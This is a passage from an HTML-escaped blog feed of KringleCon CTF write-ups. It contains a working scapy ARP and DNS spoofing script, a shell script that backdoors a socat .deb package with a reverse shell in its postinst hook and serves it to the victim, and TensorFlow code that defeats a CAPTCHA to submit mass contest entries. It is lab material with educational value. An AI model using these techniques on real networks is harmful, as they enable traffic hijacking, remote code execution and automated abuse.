&lt;span class="ln"> 7&lt;/span>&lt;span class="n">macaddr&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;:&amp;#39;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">([&lt;/span>&lt;span class="s1">&amp;#39;{:02x}&amp;#39;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">((&lt;/span>&lt;span class="n">uuid&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">getnode&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="o">&amp;gt;&amp;gt;&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">&amp;amp;&lt;/span> &lt;span class="mh">0xff&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">8&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="mi">6&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">8&lt;/span>&lt;span class="p">)][::&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="ln"> 8&lt;/span>&lt;span class="n">spoofed_ip&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;10.6.6.53&amp;#34;&lt;/span>
&lt;span class="ln"> 9&lt;/span>&lt;span class="n">spoofed_domain&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;ftp.osuosl.org&amp;#39;&lt;/span>
&lt;span class="ln">10&lt;/span>
&lt;span class="ln">11&lt;/span>&lt;span class="k">def&lt;/span> &lt;span class="nf">handle_pkt&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="ln">12&lt;/span> &lt;span class="n">response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="ln">13&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="n">ARP&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">packet&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">ARP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">op&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">14&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Spoofed APR response for {spoofed_ip} with own MAC {macaddr}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">15&lt;/span> &lt;span class="n">ether_resp&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">Ether&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">hwsrc&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nb">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mh">0x806&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">src&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="hl">&lt;span class="ln">16&lt;/span> &lt;span class="n">arp_response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">ARP&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">op&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">hwsrc&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">hwdst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">hwsrc&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">psrc&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">spoofed_ip&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">pdst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;10.6.6.35&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;span class="ln">17&lt;/span> &lt;span class="n">response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">ether_resp&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">arp_response&lt;/span>
&lt;span class="ln">18&lt;/span> &lt;span class="k">else&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">19&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Spoofed DNS response for {spoofed_domain} with own IP {ipaddr}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">20&lt;/span> &lt;span class="n">eth&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">Ether&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">src&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">dst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">Ether&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">src&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">21&lt;/span> &lt;span class="n">ip&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">IP&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dst&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">IP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">src&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">src&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">spoofed_ip&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">22&lt;/span> &lt;span class="n">udp&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">UDP&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dport&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">UDP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sport&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">sport&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">UDP&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">dport&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">23&lt;/span> &lt;span class="n">dns&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">DNS&lt;/span>&lt;span class="p">(&lt;/span>
&lt;span class="hl">&lt;span class="ln">24&lt;/span> &lt;span class="nb">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">DNS&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">id&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rd&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">qdcount&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">ancount&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">qr&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">ra&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">qd&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">packet&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">DNS&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">qd&lt;/span>&lt;span class="p">,&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln">25&lt;/span> &lt;span class="n">an&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">DNSRR&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">rrname&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;ftp.osuosl.org&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nb">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;A&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rclass&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;IN&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rdata&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">ipaddr&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">ttl&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">82159&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;span class="ln">26&lt;/span> &lt;span class="p">)&lt;/span>
&lt;span class="ln">27&lt;/span> &lt;span class="n">response&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">eth&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">ip&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">udp&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="n">dns&lt;/span>
&lt;span class="ln">28&lt;/span> &lt;span class="n">sendp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">response&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">iface&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;eth0&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">verbose&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">29&lt;/span>
&lt;span class="ln">30&lt;/span>&lt;span class="k">def&lt;/span> &lt;span class="nf">main&lt;/span>&lt;span class="p">():&lt;/span>
&lt;span class="ln">31&lt;/span> &lt;span class="n">berkeley_packet_filter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;(&amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34; and &amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">([&lt;/span>
&lt;span class="ln">32&lt;/span> &lt;span class="s2">&amp;#34;udp dst port 53&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;udp[10] &amp;amp; 0x80 = 0&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;dst host {}&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">spoofed_ip&lt;/span>&lt;span class="p">),&lt;/span> &lt;span class="s2">&amp;#34;ether dst host {}&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">macaddr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">33&lt;/span> &lt;span class="p">])&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34;) or (arp[6:2] = 1)&amp;#34;&lt;/span>
&lt;span class="ln">34&lt;/span> &lt;span class="n">sniff&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">filter&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">berkeley_packet_filter&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">prn&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">handle_pkt&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">store&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">iface&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;eth0&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">count&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">35&lt;/span>
&lt;span class="ln">36&lt;/span>&lt;span class="k">if&lt;/span> &lt;span class="vm">__name__&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s2">&amp;#34;__main__&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">37&lt;/span> &lt;span class="n">main&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, following this
&lt;a href="http://www.wannescolman.be/?p=98" target="_blank" rel="noopener">guide&lt;/a> I create the &lt;strong>backdoored&lt;/strong> .deb package which will be served by my rogue web server. It is rather straightforward as I can reuse one of the existing packages on the terminal.&lt;/p>
&lt;p>First, I make it work via &lt;code>netcat&lt;/code> but then I change to &lt;code>socat&lt;/code> because it&amp;rsquo;s able to establish a full-featured &lt;strong>TTY&lt;/strong> instead of just the text output of the typed commands.
&lt;a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/" target="_blank" rel="noopener">This link&lt;/a> offers great tips on setting up both netcat and socat in reverse shells!&lt;/p>
&lt;p>To make it repeatable, I craft the below script that takes care of every step, including the creation of the backdoored package, the starting of the ARP &amp;amp; DNS spoofing script, the starting of the web server and finally starting the &lt;code>socat&lt;/code> listener for accepting the reverse shell:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">&lt;span class="ln"> 1&lt;/span>dpkg -x debs/socat_1.7.3.3-2_amd64.deb socat
&lt;span class="ln"> 2&lt;/span>ar -x debs/socat_1.7.3.3-2_amd64.deb
&lt;span class="ln"> 3&lt;/span>tar -xf control.tar.xz
&lt;span class="ln"> 4&lt;/span>rm control.tar.xz data.tar.xz debian-binary md5sums
&lt;span class="ln"> 5&lt;/span>
&lt;span class="ln"> 6&lt;/span>mkdir socat/DEBIAN
&lt;span class="ln"> 7&lt;/span>mv control socat/DEBIAN/
&lt;span class="ln"> 8&lt;/span>touch socat/DEBIAN/postinst
&lt;span class="ln"> 9&lt;/span>chmod &lt;span class="m">775&lt;/span> socat/DEBIAN/postinst
&lt;span class="ln">10&lt;/span>&lt;span class="nv">LOCAL_IP&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="sb">`&lt;/span>ifconfig &lt;span class="p">|&lt;/span> grep -Eo &lt;span class="s1">&amp;#39;inet (addr:)?([0-9]*\.){3}[0-9]*&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep -Eo &lt;span class="s1">&amp;#39;([0-9]*\.){3}[0-9]*&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep -v &lt;span class="s1">&amp;#39;127.0.0.1&amp;#39;&lt;/span>&lt;span class="sb">`&lt;/span>
&lt;span class="ln">11&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;socat exec:&amp;#39;bash -li&amp;#39;,pty,stderr,setsid,sigint,sane tcp:&lt;/span>&lt;span class="si">${&lt;/span>&lt;span class="nv">LOCAL_IP&lt;/span>&lt;span class="si">}&lt;/span>&lt;span class="s2">:4444&amp;#34;&lt;/span> &amp;gt;&amp;gt; socat/DEBIAN/postinst
&lt;span class="hl">&lt;span class="ln">12&lt;/span>dpkg-deb --build ./socat/
&lt;/span>&lt;span class="hl">&lt;span class="ln">13&lt;/span>
&lt;/span>&lt;span class="ln">14&lt;/span>mkdir -p pub/jfrost/backdoor
&lt;span class="ln">15&lt;/span>mv socat.deb pub/jfrost/backdoor/suriv_amd64.deb
&lt;span class="ln">16&lt;/span>
&lt;span class="ln">17&lt;/span>python3 -m http.server &lt;span class="m">80&lt;/span> &lt;span class="p">&amp;amp;&lt;/span>&amp;gt;/dev/null &lt;span class="p">&amp;amp;&lt;/span> python3 spoof.py &lt;span class="p">&amp;amp;&lt;/span>&amp;gt;/dev/null &lt;span class="p">&amp;amp;&lt;/span>
&lt;span class="ln">18&lt;/span>
&lt;span class="ln">19&lt;/span>socat file:&lt;span class="sb">`&lt;/span>tty&lt;span class="sb">`&lt;/span>,raw,echo&lt;span class="o">=&lt;/span>&lt;span class="m">0&lt;/span> tcp-listen:4444
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, I am able to open a full-featured TTY reverse shell and open the txt file to get the answer:&lt;/p>
&lt;p>&lt;img src="../images/obj9/recusal.png" alt="Recusal-Solution">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Frido Sleigh contest</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective8/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective8/</guid><description>&lt;h2 id="can-i-has-cookiez">Can I has cookiez?&lt;/h2>
&lt;p>After talking with Krampus in the Steam Tunnels you realise that he knows a lot about what is going on at Elf Uni. But before he is ready to share some intel, you need to earn his trust&amp;hellip; so he asks you to win the Frido Sleigh contest which will award him with a lifetime supply of cookies. Sadly, however, the contest uses a CAPTEHA challenge, which stands for &lt;code>Completely Automated Public Turing test to tell Elves and Humans Apart&lt;/code>. Krampus is not an elf, and neither are you, so you may need to use something advanced enough that can fool the CAPTEHA and let you bypass it &amp;hellip;&lt;/p>
&lt;blockquote>
&lt;p>But, before I can tell you more, I need to know that I can trust you.
Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I&amp;rsquo;ll know I can trust you.
The contest is here on my screen and at fridosleigh.com.
No purchase necessary, enter as often as you want, so I am!
They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs.
Unfortunately, it&amp;rsquo;s restricted to elves only, and I can&amp;rsquo;t bypass the CAPTEHA.
(That&amp;rsquo;s Completely Automated Public Turing test to tell Elves and Humans Apart.)
I&amp;rsquo;ve already cataloged 12,000 images and decoded the API interface.
Can you help me bypass the CAPTEHA and submit lots of entries?&lt;/p>
&lt;/blockquote>
&lt;p>Links from the hint:&lt;/p>
&lt;ul>
&lt;li>Frido Sleigh Contest: &lt;a href="https://fridosleigh.com/">https://fridosleigh.com/&lt;/a>&lt;/li>
&lt;li>CAPTEHA images: &lt;a href="https://downloads.elfu.org/capteha_images.tar.gz">https://downloads.elfu.org/capteha_images.tar.gz&lt;/a>&lt;/li>
&lt;li>Python tool to interact with the API: &lt;a href="https://downloads.elfu.org/capteha_api.py">https://downloads.elfu.org/capteha_api.py&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>&lt;img src="../images/obj8-capteha.png" alt="Frido Sleigh CAPTEHA">&lt;/p>
&lt;p>Basically, your task is to use Machine Learning in order to train a model that can predict the category for every image in the CAPTEHA challenge and use this to submit the correct response before the CAPTEHA times out. The python script provided is of great use, but the core ML code is missing and it is not trivial to implement. Lucky for you, there is a KringleCon talk about Machine Learning for Security, which points to a Github Repository with some very useful code for this missing part:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">https://github.com/chrisjd20/img_rec_tf_ml_demo
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This library implements image recognition based on Machine Learning with TensorFlow, and it is almost a copy paste solution for this CAPTEHA python script that has some missing parts. You just need to train the model on the 12000 sample images provided by Krampus. The repo provides the training source code, as well as the prediction you can reuse in the script for interacting with the Frido Sleigh API.&lt;/p>
&lt;p>A complete solution can be found in my GitHub
&lt;a href="https://github.com/florianakos/kringlecon-capteha" target="_blank" rel="noopener">repo&lt;/a>. Most important part is the integrated ML section:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">graph&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">load_graph&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;/tmp/retrain_tmp/output_graph.pb&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">labels&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">load_labels&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;/tmp/retrain_tmp/output_labels.txt&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># Load up our session&lt;/span>
&lt;span class="n">input_operation&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">graph&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_operation_by_name&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;import/Placeholder&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">output_operation&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">graph&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_operation_by_name&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;import/final_result&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">sess&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">tf&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">compat&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">v1&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Session&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">graph&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">graph&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># Can use queues and threading to spead up the processing&lt;/span>
&lt;span class="n">q&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">queue&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Queue&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="c1">#Going to interate over each of our images.&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">image&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">b64_images&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">image_uuid&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">image&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;uuid&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Processing Image {}&amp;#39;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">image_uuid&lt;/span>&lt;span class="p">))&lt;/span>
&lt;span class="c1"># We don&amp;#39;t want to process too many images at once. 10 threads max&lt;/span>
&lt;span class="k">while&lt;/span> &lt;span class="nb">len&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">threading&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">enumerate&lt;/span>&lt;span class="p">())&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="mi">10&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">time&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sleep&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mf">0.0001&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">#predict_image function is expecting png image bytes so we read image as &amp;#39;rb&amp;#39; to get a bytes object&lt;/span>
&lt;span class="n">image_bytes&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">base64&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">b64decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">image&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;base64&amp;#34;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="n">threading&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Thread&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">target&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">predict_image&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">q&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">sess&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">graph&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">image_bytes&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">image_uuid&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">labels&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">input_operation&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">output_operation&lt;/span>&lt;span class="p">))&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">start&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Waiting For Threads to Finish...&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">while&lt;/span> &lt;span class="n">q&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">qsize&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nb">len&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">b64_images&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="n">time&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sleep&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mf">0.001&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">#getting a list of all threads returned results&lt;/span>
&lt;span class="n">prediction_results&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">q&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">x&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">q&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">qsize&lt;/span>&lt;span class="p">())]&lt;/span>
&lt;span class="c1">#do something with our results... Like print them to the screen.&lt;/span>
&lt;span class="n">predicted_uuids&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">[]&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">prediction&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">prediction_results&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">prediction&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;prediction&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">challenge_image_types&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">predicted_uuids&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">prediction&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;image_uuid&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>When you run the script, don&amp;rsquo;t forget to edit the &lt;code>yourREALemailAddress&lt;/code> variable as the Frido Sleigh contest will send you the code at this real email address.&lt;/p>
&lt;p>Once you receive the email from them, it will contain a code that you have to enter in your personal badge for solving this objective. Looks something like this: &lt;code>8Ia8LiZEwvyZr2WO&lt;/code>. After you submit it, Krampus will finally know that he can trust you, and is now ready to share some further information with you:&lt;/p>
&lt;blockquote>
&lt;p>You did it! Thank you so much. I can trust you!
To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels.
As for those scraps of paper, I scanned those and put the images on my server.
I then threw the paper away.
Unfortunately, I managed to lock out my account on the server.
Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans?
I give you permission to hack into it, solving Objective 9 in your badge.
And, as long as you&amp;rsquo;re traveling around, be sure to solve any other challenges you happen across.&lt;/p>
&lt;/blockquote></description></item><item><title>ARP Shenanigans</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective10/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective10/</guid><description>&lt;p>&lt;img src="../images/obj10/objective10.png" alt="Objective10">&lt;/p>
